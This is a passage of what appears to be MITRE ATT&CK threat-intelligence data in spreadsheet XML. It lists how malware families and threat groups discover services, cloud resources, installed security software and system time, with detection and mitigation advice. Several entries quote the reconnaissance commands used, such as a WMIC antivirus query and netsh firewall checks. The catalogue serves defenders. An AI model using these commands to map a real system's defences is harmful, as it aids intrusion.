[GravityRAT](https://attack.mitre.org/software/S0237) has a feature to list the available services on the system.(Citation: Talos GravityRAT)
GreyEnergy
[GreyEnergy](https://attack.mitre.org/software/S0342) enumerates all Windows services.(Citation: ESET GreyEnergy Oct 2018)
Heyoka Backdoor
[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can check if it is running as a service on a compromised host.(Citation: SentinelOne Aoqin Dragon June 2022)
HotCroissant
[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to retrieve a list of services on the infected host.(Citation: Carbon Black HotCroissant April 2020)
Hydraq
[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can monitor services.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)
HyperBro
[HyperBro](https://attack.mitre.org/software/S0398) can list all services and their configurations.(Citation: Unit42 Emissary Panda May 2019)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can obtain running services on the victim.(Citation: ESET InvisiMole June 2018)
Ixeshe
[Ixeshe](https://attack.mitre.org/software/S0015) can list running services.(Citation: Trend Micro IXESHE 2012)
JPIN
[JPIN](https://attack.mitre.org/software/S0201) can list running services.(Citation: Microsoft PLATINUM April 2016)
Kwampirs
[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of running services with the command &lt;code&gt;tasklist /svc&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)
LookBack
[LookBack](https://attack.mitre.org/software/S0582) can enumerate services on the victim machine.(Citation: Proofpoint LookBack Malware Aug 2019)
Net
The &lt;code&gt;net start&lt;/code&gt; command can be used in [Net](https://attack.mitre.org/software/S0039) to find information about Windows services.(Citation: Savill 1999)
PoshC2
[PoshC2](https://attack.mitre.org/software/S0378) can enumerate service and service permission information.(Citation: GitHub PoshC2)
RATANKBA
[RATANKBA](https://attack.mitre.org/software/S0241) uses &lt;code&gt;tasklist /svc&lt;/code&gt; to display running tasks.(Citation: RATANKBA)
REvil
[REvil](https://attack.mitre.org/software/S0496) can enumerate active services.(Citation: Intel 471 REvil March 2020)
RainyDay
[RainyDay](https://attack.mitre.org/software/S0629) can create and register a service for execution.(Citation: Bitdefender Naikon April 2021)
S-Type
[S-Type](https://attack.mitre.org/software/S0085) runs the command &lt;code&gt;net start&lt;/code&gt; on a victim.(Citation: Cylance Dust Storm)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) can search for modifiable services that could be used for privilege escalation.(Citation: GitHub SILENTTRINITY Modules July 2019)
SLOTHFULMEDIA
[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has the capability to enumerate services.(Citation: CISA MAR SLOTHFULMEDIA October 2020)
SUNBURST
[SUNBURST](https://attack.mitre.org/software/S0559) collected a list of service names that were hashed using a FNV-1a + XOR algorithm to check against similarly-hashed hardcoded blocklists.(Citation: FireEye SUNBURST Backdoor December 2020)
Sardonic
[Sardonic](https://attack.mitre.org/software/S1085) has the ability to execute the `net start` command.(Citation: Bitdefender Sardonic Aug 2021)
SombRAT
[SombRAT](https://attack.mitre.org/software/S0615) can enumerate services on a victim machine.(Citation: BlackBerry CostaRicto November 2020)
Sykipot
[Sykipot](https://attack.mitre.org/software/S0018) may use &lt;code&gt;net start&lt;/code&gt; to display running services.(Citation: AlienVault Sykipot 2011)
SynAck
[SynAck](https://attack.mitre.org/software/S0242) enumerates all running services.(Citation: SecureList SynAck Doppelgänging May 2018)(Citation: Kaspersky Lab SynAck May 2018)
SysUpdate
[SysUpdate](https://attack.mitre.org/software/S0663) can collect a list of services on a victim machine.(Citation: Lunghi Iron Tiger Linux)
Tasklist
[Tasklist](https://attack.mitre.org/software/S0057) can be used to discover services running on a system.(Citation: Microsoft Tasklist)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) collects a list of install programs and services on the system’s machine.(Citation: S2 Grupo TrickBot June 2017)
Ursnif
[Ursnif](https://attack.mitre.org/software/S0386) has gathered information about running services.(Citation: TrendMicro Ursnif Mar 2015)
Volgmer
[Volgmer](https://attack.mitre.org/software/S0180) queries the system to identify existing services.(Citation: US-CERT Volgmer Nov 2017)
WINERACK
[WINERACK](https://attack.mitre.org/software/S0219) can enumerate services.(Citation: FireEye APT37 Feb 2018)
ZLib
[ZLib](https://attack.mitre.org/software/S0086) has the ability to discover and manipulate Windows services.(Citation: Cylance Dust Storm)
ZxShell
[ZxShell](https://attack.mitre.org/software/S0412) can check the services on the system.(Citation: Talos ZxShell Oct 2014) 
jRAT
[jRAT](https://attack.mitre.org/software/S0283) can list local services.(Citation: Kaspersky Adwind Feb 2016)
</t>
  </si>
  <si>
    <t xml:space="preserve">Logon Session Creation
Monitor for newly constructed logon behavior across cloud service management consoles.(Citation: Mandiant Cloudy Logs 2023)
User Account Authentication
Correlate other security systems with login information, such as user accounts, IP addresses, and login names.(Citation: Mandiant Cloudy Logs 2023)
User Account Management
Enforce the principle of least-privilege by limiting dashboard visibility to only the resources required. This may limit the discovery value of the dashboard in the event of a compromised account.
</t>
  </si>
  <si>
    <t xml:space="preserve">Cloud Storage Enumeration
Monitor cloud logs for API calls and other potentially unusual activity related to cloud data object storage enumeration.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
Instance Enumeration
Monitor cloud logs for API calls and other potentially unusual activity related to cloud instance enumeration.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
Snapshot Enumeration
Monitor cloud logs for API calls and other potentially unusual activity related to snapshot enumeration.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
Volume Enumeration
Monitor cloud logs for API calls and other potentially unusual activity related to block object storage enumeration.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
User Account Management
Limit permissions to discover cloud infrastructure in accordance with least privilege. Organizations should limit the number of users within the organization with an IAM role that has administrative privileges, strive to reduce all permanent privileged role assignments, and conduct periodic entitlement reviews on IAM users, roles and policies.
Pacu
[Pacu](https://attack.mitre.org/software/S1091) can enumerate AWS infrastructure, such as EC2 instances.(Citation: GitHub Pacu)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.
Note: For Windows, Event ID 4104 (from the Microsoft-Windows-Powershell/Operational log) captures Powershell script blocks, which can be analyzed and used to detect on potential Security Software Discovery. 
Firewall Enumeration
Monitor for an extracted list of available firewalls and/or their associated settings/rules (ex: Azure Network Firewall CLI Show commands)
Firewall Metadata
Monitor for contextual data about a firewall and activity around it such as name, policy, or status
OS API Execution
Monitor for API calls that may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. OS API calls associated with LSASS process dumping include EnumProcesses, which can be used to enumerate the set of processes running on a host and filtered to look for security-specific processes. 
Note: Most EDR tools do not support direct monitoring of API calls due to the sheer volume of calls produced by an endpoint but may have alerts or events that are based on abstractions of OS API calls. Dynamic malware analysis tools (i.e., sandboxes) can be used to trace the execution, including OS API calls, for a single PE binary. 
Process Creation
Monitor newly executed processes that may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.
Frankenstein
During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used WMI queries to determine if analysis tools were running on a compromised system.(Citation: Talos Frankenstein June 2019)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used scripts to detect security software.(Citation: FoxIT Wocao December 2019)
APT38
[APT38](https://attack.mitre.org/groups/G0082) has identified security software, configurations, defensive tools, and sensors installed on a compromised system.(Citation: CISA AA20-239A BeagleBoyz August 2020)
Aquatic Panda
[Aquatic Panda](https://attack.mitre.org/groups/G0143) has attempted to discover third party endpoint detection and response (EDR) tools on compromised systems.(Citation: CrowdStrike AQUATIC PANDA December 2021)
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) used a JavaScript backdoor that is capable of collecting a list of the security solutions installed on the victim's machine.(Citation: Morphisec Cobalt Gang Oct 2018)
Darkhotel
[Darkhotel](https://attack.mitre.org/groups/G0012) has searched for anti-malware strings and anti-virus processes running on the system.(Citation: Securelist Darkhotel Aug 2015)(Citation: Microsoft DUBNIUM June 2016) 
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has used Registry keys to detect and avoid executing in potential sandboxes.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has checked for the presence of antivirus software with &lt;code&gt;powershell Get-CimInstance -Namespace root/securityCenter2 – classname antivirusproduct&lt;/code&gt;.(Citation: KISA Operation Muzabi)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware to check running processes against a hard-coded list of security tools often used by malware researchers.(Citation: Securelist MuddyWater Oct 2018)
Naikon
[Naikon](https://attack.mitre.org/groups/G0019) uses commands such as &lt;code&gt;netsh advfirewall firewall&lt;/code&gt; to discover local firewall settings.(Citation: Baumgartner Naikon 2015)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) scanned the “Program Files” directories for a directory with the string “Total Security” (the installation path of the “360 Total Security” antivirus tool).(Citation: Cymmetria Patchwork)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) used scripts which detected and uninstalled antivirus software.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)
SideCopy
[SideCopy](https://attack.mitre.org/groups/G1008) uses a loader DLL file to collect AV product names from an infected host.(Citation: MalwareBytes SideCopy Dec 2021)
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has used the Windows service &lt;code&gt;winmgmts:\\.\root\SecurityCenter2&lt;/code&gt; to check installed antivirus products.(Citation: Rewterz Sidewinder APT April 2020)
TA2541
[TA2541](https://attack.mitre.org/groups/G1018) has used tools to search victim systems for security products such as antivirus and firewall software.(Citation: Proofpoint TA2541 February 2022)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has searched for security products on infected machines.(Citation: ATT TeamTNT Chimaera September 2020)(Citation: Cisco Talos Intelligence Group)
The White Company
[The White Company](https://attack.mitre.org/groups/G0089) has checked for specific antivirus products on the target’s computer, including Kaspersky, Quick Heal, AVG, BitDefender, Avira, Sophos, Avast!, and ESET.(Citation: Cylance Shaheen Nov 2018)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) can search for anti-virus software running on the system.(Citation: Unit 42 Tropic Trooper Nov 2016)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has obtained information on security software, including security logging information that may indicate whether their malware has been detected.(Citation: ESET ComRAT May 2020)
Windshift
[Windshift](https://attack.mitre.org/groups/G0112) has used malware to identify installed AV and commonly used forensic and malware analysis tools.(Citation: BlackBerry Bahamut)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used WMI to identify anti-virus products installed on a victim's machine.(Citation: DFIR Ryuk's Return October 2020)
ABK
[ABK](https://attack.mitre.org/software/S0469) has the ability to identify the installed anti-virus product on the compromised host.(Citation: Trend Micro Tick November 2019)
Action RAT
[Action RAT](https://attack.mitre.org/software/S1028) can identify AV products on an infected host using the following command: `cmd.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List`.(Citation: MalwareBytes SideCopy Dec 2021)
Amadey
[Amadey](https://attack.mitre.org/software/S1025) has checked for a variety of antivirus products.(Citation: Korean FSI TA505 2020)(Citation: BlackBerry Amadey 2020)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) checks for the presence of Avast antivirus in the &lt;code&gt;C:\Program\Files\&lt;/code&gt; folder. (Citation: Cofense Astaroth Sept 2018)
AuTo Stealer
[AuTo Stealer](https://attack.mitre.org/software/S1029) has the ability to collect information about installed AV products from an infected host.(Citation: MalwareBytes SideCopy Dec 2021)
Avenger
[Avenger](https://attack.mitre.org/software/S0473) has the ability to identify installed anti-virus products on a compromised host.(Citation: Trend Micro Tick November 2019)
BLUELIGHT
[BLUELIGHT](https://attack.mitre.org/software/S0657) can collect a list of anti-virus products installed on a machine.(Citation: Volexity InkySquid BLUELIGHT August 2021)
BadPatch
[BadPatch](https://attack.mitre.org/software/S0337) uses WMI to enumerate installed security products in the victim’s environment.(Citation: Unit 42 BadPatch Oct 2017)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can identify the installed antivirus engine.(Citation: Cybereason Bazar July 2020)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) can detect EDR userland hooks.(Citation: Palo Alto Brute Ratel July 2022)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) can identify specific analytical tools based on running processes.(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)(Citation: Medium Ali Salem Bumblebee April 2022)
CHOPSTICK
[CHOPSTICK](https://attack.mitre.org/software/S0023) checks for antivirus and forensics software.(Citation: FireEye APT28)
Carberp
[Carberp](https://attack.mitre.org/software/S0484) has queried the infected system's registry searching for specific registry keys associated with antivirus products.(Citation: Prevx Carberp March 2011)
Clop
[Clop](https://attack.mitre.org/software/S0611) can search for processes with antivirus and antimalware product names.(Citation: Mcafee Clop Aug 2019)(Citation: Cybereason Clop Dec 2020)
Comnie
[Comnie](https://attack.mitre.org/software/S0244) attempts to detect several anti-virus products.(Citation: Palo Alto Comnie)
CookieMiner
[CookieMiner](https://attack.mitre.org/software/S0492) has checked for the presence of "Little Snitch", macOS network monitoring and application firewall software, stopping and exiting if it is found.(Citation: Unit42 CookieMiner Jan 2019)
CozyCar
The main [CozyCar](https://attack.mitre.org/software/S0046) dropper checks whether the victim has an anti-virus product installed. If the installed product is on a predetermined list, the dropper will exit.(Citation: F-Secure CozyDuke)
Crimson
[Crimson](https://attack.mitre.org/software/S0115) contains a command to collect information about anti-virus software on the victim.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)
DarkTortilla
[DarkTortilla](https://attack.mitre.org/software/S1066) can check for the Kaspersky Anti-Virus suite.(Citation: Secureworks DarkTortilla Aug 2022)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) can search for anti-virus products on the system.(Citation: Prevailion DarkWatchman 2021)
DustySky
[DustySky](https://attack.mitre.org/software/S0062) checks for the existence of anti-virus.(Citation: DustySky)
EVILNUM
[EVILNUM](https://attack.mitre.org/software/S0568) can search for anti-virus products on the system.(Citation: Prevailion EvilNum May 2020)
Empire
[Empire](https://attack.mitre.org/software/S0363) can enumerate antivirus software on the target.(Citation: Github PowerShell Empire)
Epic
[Epic](https://attack.mitre.org/software/S0091) searches for anti-malware services running on the victim’s machine and terminates itself if it finds them.(Citation: Kaspersky Turla)
EvilBunny
[EvilBunny](https://attack.mitre.org/software/S0396) has been observed querying installed antivirus software.(Citation: Cyphort EvilBunny Dec 2014)
FELIXROOT
[FELIXROOT](https://attack.mitre.org/software/S0267) checks for installed security software like antivirus and firewall.(Citation: ESET GreyEnergy Oct 2018)
Felismus
[Felismus](https://attack.mitre.org/software/S0171) checks for processes associated with anti-virus vendors.(Citation: Forcepoint Felismus Mar 2017)
Ferocious
[Ferocious](https://attack.mitre.org/software/S0679) has checked for AV software as part of its persistence process.(Citation: Kaspersky WIRTE November 2021)
FinFisher
[FinFisher](https://attack.mitre.org/software/S0182) probes the system to check for antimalware processes.(Citation: FinFisher Citation)(Citation: Securelist BlackOasis Oct 2017)
Flame
[Flame](https://attack.mitre.org/software/S0143) identifies security software such as antivirus through the Security module.(Citation: Kaspersky Flame)(Citation: Kaspersky Flame Functionality)
FlawedAmmyy
[FlawedAmmyy](https://attack.mitre.org/software/S0381) will attempt to detect anti-virus products during the initial infection.(Citation: Proofpoint TA505 Mar 2018)
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) can identify the processes for Bkav antivirus.(Citation: Bitdefender FunnyDream Campaign November 2020)
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) can check for the presence of specific security products.(Citation: ESET Gelsemium June 2021)
Gold Dragon
[Gold Dragon](https://attack.mitre.org/software/S0249) checks for anti-malware products and processes.(Citation: McAfee Gold Dragon)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can list installed security products including the Trusteer and Diebold Warsaw GAS Tecnologia online banking protections.(Citation: ESET Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can check for the presence of network sniffers, AV, and BitDefender firewall.(Citation: ESET InvisiMole June 2020)
JPIN
[JPIN](https://attack.mitre.org/software/S0201) checks for the presence of certain security-related processes and deletes its installer/uninstaller component if it identifies any of them.(Citation: Microsoft PLATINUM April 2016)
Kasidet
[Kasidet](https://attack.mitre.org/software/S0088) has the ability to identify any anti-virus installed on the infected system.(Citation: Zscaler Kasidet)
LiteDuke
[LiteDuke](https://attack.mitre.org/software/S0513) has the ability to check for the presence of Kaspersky security software.(Citation: ESET Dukes October 2019)
LitePower
[LitePower](https://attack.mitre.org/software/S0680) can identify installed AV software.(Citation: Kaspersky WIRTE November 2021)
Lizar
[Lizar](https://attack.mitre.org/software/S0681) can search for processes associated with an anti-virus product from list.(Citation: BiZone Lizar May 2021) 
Mafalda
[Mafalda](https://attack.mitre.org/software/S1060) can search for a variety of security software programs, EDR systems, and malware analysis tools.(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022)
MarkiRAT
[MarkiRAT](https://attack.mitre.org/software/S0652) can check for running processes on the victim’s machine to look for Kaspersky and Bitdefender antivirus products.(Citation: Kaspersky Ferocious Kitten Jun 2021)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) collects a list of installed antivirus software from the victim’s system.(Citation: Fortinet Metamorfo Feb 2020)(Citation: ESET Casbaneiro Oct 2019) 
Meteor
[Meteor](https://attack.mitre.org/software/S0688) has the ability to search for Kaspersky Antivirus on a victim's machine.(Citation: Check Point Meteor Aug 2021)
Micropsia
[Micropsia](https://attack.mitre.org/software/S0339) searches for anti-virus software and firewall products installed on the victim’s machine using WMI.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)
MoleNet
[MoleNet](https://attack.mitre.org/software/S0553) can use WMI commands to check the system for firewall and antivirus software.(Citation: Cybereason Molerats Dec 2020)
More_eggs
[More_eggs](https://attack.mitre.org/software/S0284) can obtain information on installed anti-malware programs.(Citation: Talos Cobalt Group July 2018)
Mosquito
[Mosquito](https://attack.mitre.org/software/S0256)'s installer searches the Registry and system to see if specific antivirus tools are installed on the system.(Citation: ESET Turla Mosquito Jan 2018)
Netwalker
[Netwalker](https://attack.mitre.org/software/S0457) can detect and terminate active security software-related processes on infected systems.(Citation: TrendMicro Netwalker May 2020)	
NotPetya
[NotPetya](https://attack.mitre.org/software/S0368) determines if specific antivirus programs are running on an infected host machine.(Citation: US District Court Indictment GRU Unit 74455 October 2020)
POWERSTATS
[POWERSTATS](https://attack.mitre.org/software/S0223) has detected security tools.(Citation: FireEye MuddyWater Mar 2018)
POWRUNER
[POWRUNER](https://attack.mitre.org/software/S0184) may collect information on the victim's anti-virus software.(Citation: FireEye APT34 Dec 2017)
PUNCHBUGGY
[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can gather AVs registered in the system.(Citation: Morphisec ShellTea June 2019)	
Pacu
[Pacu](https://attack.mitre.org/software/S1091) can enumerate AWS security services, including WAF rules and GuardDuty detectors.(Citation: GitHub Pacu)
PipeMon
[PipeMon](https://attack.mitre.org/software/S0501) can check for the presence of ESET and Kaspersky security software.(Citation: ESET PipeMon May 2020)
Prikormka
A module in [Prikormka](https://attack.mitre.org/software/S0113) collects information from the victim about installed anti-virus software.(Citation: ESET Operation Groundbait)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can identify the installed antivirus product on a targeted system.(Citation: Crowdstrike Qakbot October 2020)(Citation: ATT QakBot April 2021)(Citation: ATT QakBot April 2021)(Citation: Kaspersky QakBot September 2021)
RTM
[RTM](https://attack.mitre.org/software/S0148) can obtain information about security software on the victim.(Citation: ESET RTM Feb 2017)
Remsec
[Remsec](https://attack.mitre.org/software/S0125) has a plugin detect security products via active drivers.(Citation: Kaspersky ProjectSauron Technical Analysis)
RogueRobin
[RogueRobin](https://attack.mitre.org/software/S0270) enumerates running processes to search for Wireshark and Windows Sysinternals suite.(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) can determine if an anti-virus product is installed through the resolution of the service's virtual SID.(Citation: Security Affairs SILENTTRINITY July 2019)
SUNBURST
[SUNBURST](https://attack.mitre.org/software/S0559) checked for a variety of antivirus/endpoint detection agents prior to execution.(Citation: Microsoft Analyzing Solorigate Dec 2020)(Citation: FireEye SUNBURST Additional Details Dec 2020)
Skidmap
[Skidmap](https://attack.mitre.org/software/S0468) has the ability to check if &lt;code&gt;/usr/sbin/setenforce&lt;/code&gt; exists. This file controls what mode SELinux is in.(Citation: Trend Micro Skidmap) 
SpicyOmelette
[SpicyOmelette](https://attack.mitre.org/software/S0646) can check for the presence of 29 different antivirus tools.(Citation: Secureworks GOLD KINGSWOOD September 2018)
StoneDrill
[StoneDrill](https://attack.mitre.org/software/S0380) can check for antivirus and antimalware programs.(Citation: Kaspersky StoneDrill 2017)	
StreamEx
[StreamEx](https://attack.mitre.org/software/S0142) has the ability to scan for security tools such as firewalls and antivirus tools.(Citation: Cylance Shell Crew Feb 2017)
StrongPity
[StrongPity](https://attack.mitre.org/software/S0491) can identify if ESET or BitDefender antivirus are installed before dropping its payload.(Citation: Talos Promethium June 2020)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) enumerates the currently running processes related to a variety of security products.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
T9000
[T9000](https://attack.mitre.org/software/S0098) performs checks for various antivirus and security products during installation.(Citation: Palo Alto T9000 Feb 2016)
TajMahal
[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify which anti-virus products, firewalls, and anti-spyware products are in use.(Citation: Kaspersky TajMahal April 2019)
Tasklist
[Tasklist](https://attack.mitre.org/software/S0057) can be used to enumerate security software currently running on a system by process name of known products.(Citation: Microsoft Tasklist)
ThiefQuest
[ThiefQuest](https://attack.mitre.org/software/S0595) uses the &lt;code&gt;kill_unwanted&lt;/code&gt; function to get a list of running processes, compares each process with an encrypted list of “unwanted” security related programs, and kills the processes for security related programs.(Citation: wardle evilquest parti)
VERMIN
[VERMIN](https://attack.mitre.org/software/S0257) uses WMI to check for anti-virus software installed on the system.(Citation: Unit 42 VERMIN Jan 2018)
Valak
[Valak](https://attack.mitre.org/software/S0476) can determine if a compromised host has security products installed.(Citation: Cybereason Valak May 2020)
Waterbear
[Waterbear](https://attack.mitre.org/software/S0579) can find the presence of a specific security software.(Citation: Trend Micro Waterbear December 2019)
WhisperGate
[WhisperGate](https://attack.mitre.org/software/S0689) can recognize the presence of monitoring tools on a target system.(Citation: Unit 42 WhisperGate January 2022)
Wingbird
[Wingbird](https://attack.mitre.org/software/S0176) checks for the presence of Bitdefender security software.(Citation: Microsoft SIR Vol 21)
Woody RAT
[Woody RAT](https://attack.mitre.org/software/S1065) can detect Avast Software, Doctor Web, Kaspersky, AVG, ESET, and Sophos antivirus programs.(Citation: MalwareBytes WoodyRAT Aug 2022)
XCSSET
[XCSSET](https://attack.mitre.org/software/S0658) searches firewall configuration files located in &lt;code&gt;/Library/Preferences/&lt;/code&gt; and uses &lt;code&gt;csrutil status&lt;/code&gt; to determine if System Integrity Protection is enabled.(Citation: trendmicro xcsset xcode project 2020)
YAHOYAH
[YAHOYAH](https://attack.mitre.org/software/S0388) checks for antimalware solution processes on the system.(Citation: TrendMicro TropicTrooper 2015)
Zeus Panda
[Zeus Panda](https://attack.mitre.org/software/S0330) checks to see if anti-virus, anti-spyware, or firewall products are installed in the victim’s environment.(Citation: Talos Zeus Panda Nov 2017)(Citation: GDATA Zeus Panda June 2017)
ZxxZ
[ZxxZ](https://attack.mitre.org/software/S1013) can search a compromised host to determine if it is running Windows Defender or Kasperky antivirus.(Citation: Cisco Talos Bitter Bangladesh May 2022)
build_downer
[build_downer](https://attack.mitre.org/software/S0471) has the ability to detect if the infected host is running an anti-virus process.(Citation: Trend Micro Tick November 2019)
down_new
[down_new](https://attack.mitre.org/software/S0472) has the ability to detect anti-virus products and processes on a compromised host.(Citation: Trend Micro Tick November 2019)
jRAT
[jRAT](https://attack.mitre.org/software/S0283) can list security software, such as by using WMIC to identify anti-virus products installed on the victim’s machine and to obtain firewall details.(Citation: jRAT Symantec Aug 2018)(Citation: Kaspersky Adwind Feb 2016)
netsh
[netsh](https://attack.mitre.org/software/S0108) can be used to discover system firewall settings.(Citation: TechNet Netsh)(Citation: TechNet Netsh Firewall)
xCaon
[xCaon](https://attack.mitre.org/software/S0653) has checked for the existence of Kaspersky antivirus software on the system.(Citation: Checkpoint IndigoZebra July 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for actions that may gather the system time and/or time zone from a local or remote system.
OS API Execution
Monitor for API calls that may gather the system time and/or time zone from a local or remote system. Remote access tools with built-in features may interact directly with the Windows API to gather information.
Process Creation
Monitor for newly executed processes that may gather the system time and/or time zone from a local or remote system.
C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used the command `net view /all time` to gather the local time of a compromised network.(Citation: DFIR Conti Bazar Nov 2021)
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `net time` command as part of their advanced reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used the `time` command to retrieve the current time of a compromised system.(Citation: FoxIT Wocao December 2019)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used &lt;code&gt;net time&lt;/code&gt; to check the local time on a target system.(Citation: Secureworks BRONZE BUTLER Oct 2017)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used &lt;code&gt;time /t&lt;/code&gt; and &lt;code&gt;net time \\ip/hostname&lt;/code&gt; for system time discovery.(Citation: NCC Group Chimera January 2021)
Darkhotel
[Darkhotel](https://attack.mitre.org/groups/G0012) malware can obtain system time from a compromised host.(Citation: Lastline DarkHotel Just In Time Decryption Nov 2015)
Higaisa
[Higaisa](https://attack.mitre.org/groups/G0126) used a function to gather the current time.(Citation: Zscaler Higaisa 2020)
Lazarus Group
A Destover-like implant used by [Lazarus Group](https://attack.mitre.org/groups/G0032) can obtain the current system time and send it to the C2 server.(Citation: McAfee GhostSecret)
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has used tools to obtain the current system time.(Citation: ATT Sidewinder January 2021)
The White Company
[The White Company](https://attack.mitre.org/groups/G0089) has checked the current date on the victim system.(Citation: Cylance Shaheen Nov 2018)
Turla
[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover the system time by using the &lt;code&gt;net time&lt;/code&gt; command.(Citation: Kaspersky Turla)
ZIRCONIUM
[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used a tool to capture the time on a compromised host in order to register it with C2.(Citation: Zscaler APT31 Covid-19 October 2020)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) can collect the timestamp from the victim’s machine.(Citation: DigiTrust Agent Tesla Jan 2017)
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) can pull a timestamp from the victim's machine.(Citation: Malwarebytes Kimsuky June 2021)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) collects the timestamp from the infected machine. (Citation: Cofense Astaroth Sept 2018)
AvosLocker
[AvosLocker](https://attack.mitre.org/software/S1053) has checked the system time before and after encryption.(Citation: Malwarebytes AvosLocker Jul 2021)
Azorult
[Azorult](https://attack.mitre.org/software/S0344) can collect the time zone information from the system.(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can obtain the `DATETIME` from a compromised machine.(Citation: BitDefender BADHATCH Mar 2021)  
BLUELIGHT
[BLUELIGHT](https://attack.mitre.org/software/S0657) can collect the local time on a compromised host.(Citation: Volexity InkySquid BLUELIGHT August 2021)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can collect the time on the compromised host.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)
BendyBear
[BendyBear](https://attack.mitre.org/software/S0574) has the ability to determine local time on a compromised host.(Citation: Unit42 BendyBear Feb 2021) 
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) can check the system time set on the infected host.(Citation: Kaspersky CactusPete Aug 2020)
Cannon
[Cannon](https://attack.mitre.org/software/S0351) can collect the current time zone information from the victim’s machine.(Citation: Unit42 Cannon Nov 2018)
Carbon
[Carbon](https://attack.mitre.org/software/S0335) uses the command &lt;code&gt;net time \\127.0.0.1&lt;/code&gt; to get information the system’s time.(Citation: GovCERT Carbon May 2016)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) can determine the current time.(Citation: Trend Micro DRBControl February 2020)
ComRAT
[ComRAT](https://attack.mitre.org/software/S0126) has checked the victim system's date and time to perform tasks during business hours (9 to 5, Monday to Friday).(Citation: CISA ComRAT Oct 2020) 
Conficker
[Conficker](https://attack.mitre.org/software/S0608) uses the current UTC victim system date for domain generation and connects to time servers to determine the current date.(Citation: SANS Conficker)(Citation: Trend Micro Conficker)
Crimson
[Crimson](https://attack.mitre.org/software/S0115) has the ability to determine the date and time on a compromised host.(Citation: Kaspersky Transparent Tribe August 2020)
DCSrv
[DCSrv](https://attack.mitre.org/software/S1033) can compare the current time on an infected host with a configuration value to determine when to start the encryption process.(Citation: Checkpoint MosesStaff Nov 2021)
DRATzarus
[DRATzarus](https://attack.mitre.org/software/S0694) can use the `GetTickCount` and `GetSystemTimeAsFileTime` API calls to inspect system time.(Citation: ClearSky Lazarus Aug 2020)
DarkWatchman
